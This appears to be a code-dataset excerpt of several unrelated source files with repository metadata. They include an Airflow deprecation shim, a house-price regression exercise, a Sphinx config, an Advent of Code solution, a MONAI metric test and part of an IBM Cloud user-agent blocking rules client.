save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(mark)),
epoch, model, optimizer)
with torch.no_grad():
log_dict_val, preds = trainer.val(epoch, val_loader)
for k, v in log_dict_val.items():
logger.scalar_summary('val_{}'.format(k), v, epoch)
logger.write_epoch('{} {:8f} | '.format(k, v))
if log_dict_val[opt.metric] < best:
best = log_dict_val[opt.metric]
save_model(os.path.join(opt.save_dir, 'model_best.pth'),
epoch, model)
else:
save_model(os.path.join(opt.save_dir, 'model_last.pth'),
epoch, model, optimizer)
logger.write_epoch('\n')
if epoch in opt.lr_step:
save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(epoch)),
epoch, model, optimizer)
lr = opt.lr * (0.1 ** (opt.lr_step.index(epoch) + 1))
print('Drop LR to', lr)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
logger.close_epoch()
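# Example invocation (comment only; the task name and flag values are illustrative
# and depend on the options defined in opts.py):
#     python src/train_backup.py ctdet --exp_id coco_dla --batch_size 32 --lr 1.25e-4 --gpus 0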
if __name__ == '__main__':
opt = opts().parse()
main(opt) | 35.330097 | 80 | 0.625447 |
3536e52560749ad5eb510dbcb5c69bff04580784 | 1,272 | py | Python | airflow/contrib/sensors/gcs_sensor.py | kpathak13/airflow-1 | 02b478ef8a7e1c1f890e5eb89842333a53654a70 | [
"Apache-2.0"
] | 1 | 2019-10-02T13:33:48.000Z | 2019-10-02T13:33:48.000Z | airflow/contrib/sensors/gcs_sensor.py | kpathak13/airflow-1 | 02b478ef8a7e1c1f890e5eb89842333a53654a70 | [
"Apache-2.0"
] | null | null | null | airflow/contrib/sensors/gcs_sensor.py | kpathak13/airflow-1 | 02b478ef8a7e1c1f890e5eb89842333a53654a70 | [
"Apache-2.0"
] | 1 | 2019-11-26T21:53:20.000Z | 2019-11-26T21:53:20.000Z | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.gcp.sensors.gcs`."""
import warnings
# pylint: disable=unused-import
from airflow.gcp.sensors.gcs import ( # noqa
GoogleCloudStorageObjectSensor,
GoogleCloudStorageObjectUpdatedSensor,
GoogleCloudStoragePrefixSensor,
GoogleCloudStorageUploadSessionCompleteSensor
)
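# Migration example (comment only): replace
#     from airflow.contrib.sensors.gcs_sensor import GoogleCloudStoragePrefixSensor
# with
#     from airflow.gcp.sensors.gcs import GoogleCloudStoragePrefixSensor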
warnings.warn(
"This module is deprecated. Please use `airflow.gcp.sensors.gcs`.",
DeprecationWarning, stacklevel=2
)
| 36.342857 | 71 | 0.766509 |
e62e7de25b2bea64cac69995599543ee5b3e1788 | 6,696 | py | Python | exercises/house_price_prediction.py | assafine/IML.HUJI | b81b8beff05b5f120aa21a2f7fe90b4db95174f4 | [
"MIT"
] | null | null | null | exercises/house_price_prediction.py | assafine/IML.HUJI | b81b8beff05b5f120aa21a2f7fe90b4db95174f4 | [
"MIT"
] | null | null | null | exercises/house_price_prediction.py | assafine/IML.HUJI | b81b8beff05b5f120aa21a2f7fe90b4db95174f4 | [
"MIT"
] | null | null | null | from IMLearn.utils import split_train_test
from IMLearn.learners.regressors import LinearRegression
from IMLearn.metrics import loss_functions as ls
from typing import NoReturn
import numpy as np
import pandas as pd
import plotly.graph_objects as go
import plotly.express as px
import plotly.io as pio
pio.templates.default = "simple_white"
def load_data(filename: str):
"""
Load house prices dataset and preprocess data.
Parameters
----------
filename: str
Path to house prices dataset
Returns
-------
Design matrix and response vector (prices) - either as a single
DataFrame or a Tuple[DataFrame, Series]
"""
data = pd.read_csv(filename)
# Drop problematic values
data["date"] = pd.to_datetime(data["date"], errors='coerce')
data.dropna(inplace=True)
data.drop(data[(data["price"] <= 0) | (data["bedrooms"] > 20) | (
data["sqft_lot15"] <= 0) | (data["price"] <= 0) | (
data["bedrooms"] <= 0)].index,
inplace=True)
    # Create new feature: time since the house was last built or renovated
data["time_since_built"] = data.apply(lambda row: delta_time(row), axis=1)
data.loc[data["time_since_built"] < 0, "time_since_built"] = 0
data["grade^6"] = data["grade"] ** 6
data["time_since_built^0.3"] = data["time_since_built"] ** 0.3
data["baths_by_beds"] = data["bathrooms"] / data["bedrooms"]
data["living_room_ratio2"] = data["sqft_living"] / data["sqft_lot"]
data["bed_times_baths_sqaured"] = data["bedrooms"] * data["bathrooms"] ** 2
data["condition_by_grade^5"] = data["condition"] * data["grade"] ** 5
# Catagorise zipcode
data = pd.concat([data, pd.get_dummies(data["zipcode"], prefix="zipcode")],
axis=1)
# Choose features based on Pearson Correlation:
X = data[['condition_by_grade^5', 'grade^6', 'sqft_living', 'grade',
'sqft_above', 'sqft_living15', 'bed_times_baths_sqaured',
'bathrooms',
'view', 'sqft_basement', 'bedrooms', 'lat', 'baths_by_beds',
'zipcode_98004.0', 'waterfront', 'floors', 'zipcode_98039.0',
'zipcode_98040.0', 'zipcode_98112.0', 'zipcode_98006.0',
'yr_renovated',
'living_room_ratio2', 'zipcode_98033.0', 'zipcode_98105.0',
'sqft_lot',
'zipcode_98075.0', 'zipcode_98199.0', 'sqft_lot15',
'zipcode_98002.0',
'zipcode_98168.0', 'zipcode_98001.0', 'zipcode_98042.0',
'time_since_built', 'zipcode_98023.0', 'time_since_built^0.3']]
y = data['price']
return (X, y)
def feature_evaluation(X: pd.DataFrame, y: pd.Series,
output_path: str = ".") -> NoReturn:
"""
Create scatter plot between each feature and the response.
- Plot title specifies feature name
- Plot title specifies Pearson Correlation between feature and response
- Plot saved under given folder with file name including feature name
Parameters
----------
X : DataFrame of shape (n_samples, n_features)
Design matrix of regression problem
y : array-like of shape (n_samples, )
Response vector to evaluate against
output_path: str (default ".")
Path to folder in which plots are saved
"""
for feature in X.columns:
x = X[feature]
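        # Pearson correlation between this feature and the response:
        # rho = cov(x, y) / (std(x) * std(y)), which always lies in [-1, 1].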
        pc = np.cov(x, y=y, ddof=0)[0][1] / (np.std(x) * np.std(y))
my_fig = go.Figure()
my_fig.add_trace(
go.Scatter(x=x, y=y, mode="markers"))
my_fig.update_layout(
title=f"{feature} to response, correlation: {pc}",
xaxis_title=f"{feature}",
yaxis_title="y",
font=dict(
size=12
))
my_fig.write_image(f"{output_path}/{feature}_scatter.jpeg")
def delta_time(row):
if row["yr_renovated"] == 0:
return row["date"].year - row["yr_built"]
return row["date"].year - row["yr_renovated"]
if __name__ == '__main__':
# Note: Running the code takes a while, uses a lot of features
np.random.seed(0)
# Question 1 - Load and preprocessing of housing prices dataset
filename = f"C:/Users/Assaf/Documents/University/Year 2 - Semester B/IML/" \
f"Git Environment/IML.HUJI/datasets/house_prices.csv"
X, y = load_data(filename)
# Question 2 - Feature evaluation with respect to response
dir_path = r"C:\Users\Assaf\Documents\University\Year 2 - Semester B\IML\Exercises" \
r"\Ex2\plots_houses"
feature_evaluation(X, y, dir_path)
# Question 3 - Split samples into training- and testing sets.
train_X, train_y, test_X, test_y = split_train_test(X, y)
# Question 4 - Fit model over increasing percentages of the overall training data
# For every percentage p in 10%, 11%, ..., 100%, repeat the following 10 times:
# 1) Sample p% of the overall training data
# 2) Fit linear model (including intercept) over sampled set
# 3) Test fitted model over test set
# 4) Store average and variance of loss over test set
# Then plot average loss as function of training size with error ribbon of size (mean-2*std, mean+2*std)
model = LinearRegression()
full_train_mat = pd.concat([train_X, train_y], axis=1)
loss_array = []
for p in range(10, 101):
loss_test_p = []
for _ in range(10):
sample = full_train_mat.sample(frac=p / 100)
sample_y = sample["price"].to_numpy()
sample_X = sample.drop(columns=["price"]).to_numpy()
model.fit(sample_X, sample_y)
predict_y = model.predict(test_X.to_numpy())
loss_test_p.append(ls.mean_square_error(test_y, predict_y))
loss_array.append([p, np.mean(loss_test_p), np.std(loss_test_p)])
loss_array = np.array(loss_array).T
my_fig = go.Figure()
my_fig.add_trace(
go.Scatter(x=loss_array[0, :], y=loss_array[1, :], mode="markers"))
my_fig.add_trace(
go.Scatter(x=loss_array[0, :],
y=loss_array[1, :] - 2 * loss_array[2, :],
fill=None, mode="lines", line=dict(color="lightgrey"),
showlegend=False))
my_fig.add_trace(
go.Scatter(x=loss_array[0, :],
y=loss_array[1, :] + 2 * loss_array[2, :],
fill='tonexty', mode="lines", line=dict(color="lightgrey"),
showlegend=False))
my_fig.update_layout(
title=f"Mean loss plot as function of sample size",
xaxis_title="Sample percent",
yaxis_title="MSE",
font=dict(
size=18
))
my_fig.show()
| 39.857143 | 108 | 0.613202 |
240bd4284947739df405aded1875eed14b946513 | 201 | py | Python | gluu_ecommerce/views.py | coseasonruby/Gluu-Ecommerce-djagno-project | d196309bbd76571ee7793bd3de4342eb81f789e1 | ["MIT"] | null | null | null | gluu_ecommerce/views.py | coseasonruby/Gluu-Ecommerce-djagno-project | d196309bbd76571ee7793bd3de4342eb81f789e1 | ["MIT"] | null | null | null | gluu_ecommerce/views.py | coseasonruby/Gluu-Ecommerce-djagno-project | d196309bbd76571ee7793bd3de4342eb81f789e1 | ["MIT"] | null | null | null |
from django.shortcuts import render
def handle_500(request):
return render(request, '500.html', status=500)
def handle_404(request):
return render(request, '400.html', status=404)
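# Sketch of how these handlers are typically wired up (assumed to live in the
# project's root urls.py, which is not part of this file):
#   handler404 = 'gluu_ecommerce.views.handle_404'
#   handler500 = 'gluu_ecommerce.views.handle_500'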
| 20.1 | 51 | 0.701493 |
c8c9ef3088995290c8b1331788df4786e6875890 | 5,475 | py | Python | doc/conf.py | seirl/matrix-nio | e3be482b0558da52c62c53e435afc832d22e208c | ["Apache-2.0"] | null | null | null | doc/conf.py | seirl/matrix-nio | e3be482b0558da52c62c53e435afc832d22e208c | ["Apache-2.0"] | null | null | null | doc/conf.py | seirl/matrix-nio | e3be482b0558da52c62c53e435afc832d22e208c | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import sphinx
sys.path.insert(0, os.path.abspath('../'))
# -- Project information -----------------------------------------------------
project = 'nio'
copyright = '2020, Damir Jelić'
author = 'Damir Jelić'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '0.18.3'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Mock out the Olm module since it can't be installed without the C lib.
autodoc_mock_imports = ["olm"]
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
'sphinx.ext.napoleon',
'm2r2',
]
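# m2r2 converts the Markdown sources accepted via ``source_suffix`` below so they
# can be built alongside the reStructuredText files.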
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'niodoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'nio.tex', 'nio Documentation',
'Damir Jelić', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'nio', 'nio Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'nio', 'nio Documentation',
author, 'nio', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
| 28.968254 | 79 | 0.645662 |
6fbc4aa579252278e292531e3d23bbc6862d327c | 5,591 | py | Python | 24-2.py | InCogNiTo124/AoC2018 | 846e625a2d51b7746fb636b0ad9ab5908ee6d056 | ["BSD-2-Clause"] | null | null | null | 24-2.py | InCogNiTo124/AoC2018 | 846e625a2d51b7746fb636b0ad9ab5908ee6d056 | ["BSD-2-Clause"] | null | null | null | 24-2.py | InCogNiTo124/AoC2018 | 846e625a2d51b7746fb636b0ad9ab5908ee6d056 | ["BSD-2-Clause"] | null | null | null |
import copy
class Group:
def __init__(self, name, count, hit_points, immune_set, weak_set, dmg, atk_type, initiative):
self.name = name
self.unit_count = count
self.unit_hit_point = hit_points
self.immune_to = immune_set
self.weak_to = weak_set
self.atk_dmg = dmg
self.atk_type = atk_type
self.initiative = initiative
self.target = None
self.is_target = False
return
def calculate_effective_power(self):
return self.unit_count * self.atk_dmg
def calculate_dmg(self, group):
if group.immune_to is not None and self.atk_type in group.immune_to:
return 0
elif group.weak_to is not None and self.atk_type in group.weak_to:
return self.calculate_effective_power() * 2
else:
return self.calculate_effective_power()
def __repr__(self):
return "{} {} units".format(self.name, self.unit_count)
immune_system = [
# TEST
# Group("Imn1", 17, 5390, None, {'radiation', 'bludgeoning'}, 4507, 'fire', 2),
# Group("Imn2", 989, 1274, {'fire'}, {'bludgeoning', 'slashing'}, 25, 'slashing', 3),
Group("Imn1", 4592, 2061, {'slashing', 'radiation'}, {'cold'}, 4, 'fire', 9),
Group("Imn2", 1383, 3687, None, None, 26, 'radiation', 15),
Group("Imn3", 2736, 6429, {'slashing'}, None, 20, 'slashing', 2),
Group("Imn4", 777, 3708, {'radiation', 'cold'}, {'slashing', 'fire'}, 39, 'cold', 4),
Group("Imn5", 6761, 2792, {'bludgeoning', 'fire', 'cold', 'slashing'}, None, 3, 'radiation', 17),
Group("Imn6", 6028, 5537, {'slashing'}, None, 7, 'radiation', 6),
Group("Imn7", 2412, 2787, None, None, 9, 'bludgeoning', 20),
Group("Imn8", 6042, 7747, {'radiation'}, None, 12, 'slashing', 12),
Group("Imn9", 1734, 7697, None, {'radiation', 'cold'}, 38, 'cold', 10),
Group("Imn0", 4391, 3250, None, None, 7, 'cold', 19),
]
infection = [
# TEST
# Group("Inf1", 801, 4706, None, {'radiation'}, 116, 'bludgeoning', 1),
# Group("Inf2", 4485, 2961, {'radiation'}, {'fire', 'cold'}, 12, 'slashing', 4),
Group("Inf1", 820, 46229, {'cold', 'bludgeoning'}, None, 106, 'slashing', 18),
Group("Inf2", 723, 30757, None, {'bludgeoning'}, 80, 'fire', 3),
Group("Inf3", 2907, 51667, {'bludgeoning'}, {'slashing'}, 32, 'fire', 1),
Group("Inf4", 2755, 49292, None, {'bludgeoning'}, 34, 'fire', 5),
Group("Inf5", 5824, 24708, {'cold', 'bludgeoning', 'radiation', 'slashing'}, None, 7, 'bludgeoning', 11),
Group("Inf6", 7501, 6943, {'slashing'}, {'cold'}, 1, 'radiation', 8),
Group("Inf7", 573, 10367, None, {'cold', 'slashing'}, 30, 'radiation', 16),
Group("Inf8", 84, 31020, None, {'cold'}, 639, 'slashing', 14),
Group("Inf9", 2063, 31223, {'bludgeoning'}, {'radiation'}, 25, 'cold', 13),
Group("Inf0", 214, 31088, None, {'fire'}, 271, 'slashing', 7)
]
#assert infection[0] == copy.deepcopy(infection[0])
def target_selection(attackers, defenders):
attackers = sorted(attackers, key=lambda t: (t.calculate_effective_power(), t.initiative), reverse=True)
for attacker in attackers:
defenders.sort(key=lambda t: (attacker.calculate_dmg(t), t.calculate_effective_power(), t.initiative), reverse=True)
# print(" | ".join(["{} {} {}".format(repr(t), t.is_target, attacker.calculate_dmg(t)) for t in defenders]))
for t in defenders:
if not t.is_target and attacker.calculate_dmg(t) > 0:
# print('-->', attacker, t, attacker.calculate_dmg(t))
t.is_target = True
attacker.target = t
break
return
def remove_defeated(a):
s = set([t for t in a if t.unit_count <= 0])
for t in s:
if t.target is not None:
t.target.is_target = False
a.remove(t)
return a
boost = 0
while True:
boost += 1
if boost == 11:
continue
print('\nBOOST:', boost, '\n')
before_imn = None
immune_groups = copy.deepcopy(immune_system)
for t in immune_groups:
t.atk_dmg += boost
# print(t, t.atk_dmg)
before_inf = None
infection_groups = copy.deepcopy(infection)
while len(immune_groups) > 0 and len(infection_groups) > 0:
target_selection(immune_groups, infection_groups)
target_selection(infection_groups, immune_groups)
if sum(t.is_target for t in immune_groups) == 0 and sum(t.is_target for t in infection_groups) == 0:
break
for attacker in sorted(immune_groups + infection_groups, key=lambda t: t.initiative, reverse=True):
if attacker.target is not None and\
attacker.target.unit_count > 0 and\
attacker.unit_count > 0:
target = attacker.target
dmg = attacker.calculate_dmg(target)
# print('\t', attacker.initiative, attacker, '|', dmg, '|', target, '|', dmg // target.unit_hit_point)
target.unit_count -= dmg // target.unit_hit_point
attacker.target = None
target.is_target = False
        # Total units at the end of the previous round (None on the first round);
        # used below to detect a stalemate.
        prev_units = (None if before_imn is None else sum(t.unit_count for t in before_imn),
                      None if before_inf is None else sum(t.unit_count for t in before_inf))
        before_imn, before_inf, immune_groups, infection_groups = \
            copy.deepcopy(immune_groups),\
            copy.deepcopy(infection_groups),\
            remove_defeated(immune_groups),\
            remove_defeated(infection_groups)
        # Group defines no __eq__, so comparing the deepcopied snapshots directly can
        # never succeed; compare total unit counts between rounds instead, and stop
        # once a whole round passes in which neither army loses a single unit.
        if prev_units == (sum(t.unit_count for t in before_imn),
                          sum(t.unit_count for t in before_inf)):
            break
#print(immune_groups)
#print(infection_groups)
if len(immune_groups) > 0 and len(infection_groups) == 0:
break
print(sum(t.unit_count for t in immune_groups))
| 44.373016 | 124 | 0.607584 |
e728c80be6df0f43af18a2197192f6b001f24c63 | 1,994 | py | Python | tests/test_handler_rocauc_dist.py | albarqounilab/MONAI | bb0b307d68021a243011a58fd82a1d275f00a51a | ["Apache-2.0"] | 1 | 2021-08-02T07:18:50.000Z | 2021-08-02T07:18:50.000Z | tests/test_handler_rocauc_dist.py | albarqounilab/MONAI | bb0b307d68021a243011a58fd82a1d275f00a51a | ["Apache-2.0"] | null | null | null | tests/test_handler_rocauc_dist.py | albarqounilab/MONAI | bb0b307d68021a243011a58fd82a1d275f00a51a | ["Apache-2.0"] | null | null | null |
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
import torch
import torch.distributed as dist
from monai.handlers import ROCAUC
from monai.transforms import Activations, AsDiscrete
from tests.utils import DistCall, DistTestCase
class DistributedROCAUC(DistTestCase):
@DistCall(nnodes=1, nproc_per_node=2, node_rank=0)
def test_compute(self):
auc_metric = ROCAUC()
act = Activations(softmax=True)
to_onehot = AsDiscrete(to_onehot=True, n_classes=2)
device = f"cuda:{dist.get_rank()}" if torch.cuda.is_available() else "cpu"
if dist.get_rank() == 0:
y_pred = [torch.tensor([0.1, 0.9], device=device), torch.tensor([0.3, 1.4], device=device)]
y = [torch.tensor([0], device=device), torch.tensor([1], device=device)]
if dist.get_rank() == 1:
y_pred = [
torch.tensor([0.2, 0.1], device=device),
torch.tensor([0.1, 0.5], device=device),
torch.tensor([0.3, 0.4], device=device),
]
y = [torch.tensor([0], device=device), torch.tensor([1], device=device), torch.tensor([1], device=device)]
y_pred = [act(p) for p in y_pred]
y = [to_onehot(y_) for y_ in y]
auc_metric.update([y_pred, y])
result = auc_metric.compute()
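        # Pooled across both ranks there are 3 positive and 2 negative samples; the
        # softmax scores rank 4 of the 6 positive/negative pairs correctly, so the
        # expected AUC is 4/6 ~= 0.66667.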
np.testing.assert_allclose(0.66667, result, rtol=1e-4)
if __name__ == "__main__":
unittest.main()
| 36.925926 | 118 | 0.661986 |
7f679aacf799bef75b10def7cd3858d1edcd83d2 | 39,584 | py | Python | ibm_cloud_networking_services/user_agent_blocking_rules_v1.py | IBM/networking-services-python-sdk | a19e47db6a5971562a502982d69a5868997245f3 | ["Apache-2.0"] | 1 | 2020-12-22T03:51:33.000Z | 2020-12-22T03:51:33.000Z | ibm_cloud_networking_services/user_agent_blocking_rules_v1.py | IBM/networking-services-python-sdk | a19e47db6a5971562a502982d69a5868997245f3 | ["Apache-2.0"] | 57 | 2020-06-24T06:58:01.000Z | 2022-03-28T14:52:33.000Z | ibm_cloud_networking_services/user_agent_blocking_rules_v1.py | IBM/networking-services-python-sdk | a19e47db6a5971562a502982d69a5868997245f3 | ["Apache-2.0"] | 10 | 2020-06-23T04:09:28.000Z | 2022-03-26T18:20:35.000Z |
# coding: utf-8
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
User-Agent Blocking Rules
"""
from enum import Enum
from typing import Dict, List
import json
from ibm_cloud_sdk_core import BaseService, DetailedResponse
from ibm_cloud_sdk_core.authenticators.authenticator import Authenticator
from ibm_cloud_sdk_core.get_authenticator import get_authenticator_from_environment
from ibm_cloud_sdk_core.utils import convert_model
from .common import get_sdk_headers
##############################################################################
# Service
##############################################################################
class UserAgentBlockingRulesV1(BaseService):
"""The User-Agent Blocking Rules V1 service."""
DEFAULT_SERVICE_URL = 'https://api.cis.cloud.ibm.com'
DEFAULT_SERVICE_NAME = 'user_agent_blocking_rules'
@classmethod
def new_instance(cls,
crn: str,
zone_identifier: str,
service_name: str = DEFAULT_SERVICE_NAME,
) -> 'UserAgentBlockingRulesV1':
"""
Return a new client for the User-Agent Blocking Rules service using the
specified parameters and external configuration.
:param str crn: Full url-encoded cloud resource name (CRN) of resource
instance.
:param str zone_identifier: Zone identifier of the zone for which
user-agent rule is created.
"""
if crn is None:
raise ValueError('crn must be provided')
if zone_identifier is None:
raise ValueError('zone_identifier must be provided')
authenticator = get_authenticator_from_environment(service_name)
service = cls(
crn,
zone_identifier,
authenticator
)
service.configure_service(service_name)
return service
def __init__(self,
crn: str,
zone_identifier: str,
authenticator: Authenticator = None,
) -> None:
"""
Construct a new client for the User-Agent Blocking Rules service.
:param str crn: Full url-encoded cloud resource name (CRN) of resource
instance.
:param str zone_identifier: Zone identifier of the zone for which
user-agent rule is created.
:param Authenticator authenticator: The authenticator specifies the authentication mechanism.
Get up to date information from https://github.com/IBM/python-sdk-core/blob/master/README.md
about initializing the authenticator of your choice.
"""
if crn is None:
raise ValueError('crn must be provided')
if zone_identifier is None:
raise ValueError('zone_identifier must be provided')
BaseService.__init__(self,
service_url=self.DEFAULT_SERVICE_URL,
authenticator=authenticator)
self.crn = crn
self.zone_identifier = zone_identifier
#########################
# User-Agent Blocking Rules
#########################
def list_all_zone_user_agent_rules(self,
*,
page: int = None,
per_page: int = None,
**kwargs
) -> DetailedResponse:
"""
List all user-agent blocking rules.
List all user agent blocking rules.
:param int page: (optional) Page number of paginated results.
:param int per_page: (optional) Maximum number of user-agent rules per
page.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `ListUseragentRulesResp` object
"""
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='list_all_zone_user_agent_rules')
headers.update(sdk_headers)
params = {
'page': page,
'per_page': per_page
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules'.format(
*self.encode_path_vars(self.crn, self.zone_identifier))
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request)
return response
def create_zone_user_agent_rule(self,
*,
mode: str = None,
configuration: 'UseragentRuleInputConfiguration' = None,
paused: bool = None,
description: str = None,
**kwargs
) -> DetailedResponse:
"""
Create user-agent blocking rule.
Create a new user-agent blocking rule for a given zone under a service instance.
:param str mode: (optional) The type of action to perform.
:param UseragentRuleInputConfiguration configuration: (optional)
Target/Value pair to use for this rule. The value is the exact UserAgent to
match.
:param bool paused: (optional) Whether this user-agent rule is currently
disabled.
:param str description: (optional) Some useful information about this rule
to help identify the purpose of it.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `UseragentRuleResp` object
"""
if configuration is not None:
configuration = convert_model(configuration)
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='create_zone_user_agent_rule')
headers.update(sdk_headers)
data = {
'mode': mode,
'configuration': configuration,
'paused': paused,
'description': description
}
data = {k: v for (k, v) in data.items() if v is not None}
data = json.dumps(data)
headers['content-type'] = 'application/json'
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules'.format(
*self.encode_path_vars(self.crn, self.zone_identifier))
request = self.prepare_request(method='POST',
url=url,
headers=headers,
data=data)
response = self.send(request)
return response
def delete_zone_user_agent_rule(self,
useragent_rule_identifier: str,
**kwargs
) -> DetailedResponse:
"""
Delete user-agent blocking rule.
Delete a user-agent blocking rule for a particular zone, given its id.
:param str useragent_rule_identifier: Identifier of the user-agent rule to
be deleted.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `DeleteUseragentRuleResp` object
"""
if useragent_rule_identifier is None:
raise ValueError('useragent_rule_identifier must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='delete_zone_user_agent_rule')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules/{2}'.format(
*self.encode_path_vars(self.crn, self.zone_identifier, useragent_rule_identifier))
request = self.prepare_request(method='DELETE',
url=url,
headers=headers)
response = self.send(request)
return response
def get_user_agent_rule(self,
useragent_rule_identifier: str,
**kwargs
) -> DetailedResponse:
"""
Get user-agent blocking rule.
For a given service instance, zone id and user-agent rule id, get the user-agent
blocking rule details.
:param str useragent_rule_identifier: Identifier of user-agent blocking
rule for the given zone.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `UseragentRuleResp` object
"""
if useragent_rule_identifier is None:
raise ValueError('useragent_rule_identifier must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='get_user_agent_rule')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules/{2}'.format(
*self.encode_path_vars(self.crn, self.zone_identifier, useragent_rule_identifier))
request = self.prepare_request(method='GET',
url=url,
headers=headers)
response = self.send(request)
return response
def update_user_agent_rule(self,
useragent_rule_identifier: str,
*,
mode: str = None,
configuration: 'UseragentRuleInputConfiguration' = None,
paused: bool = None,
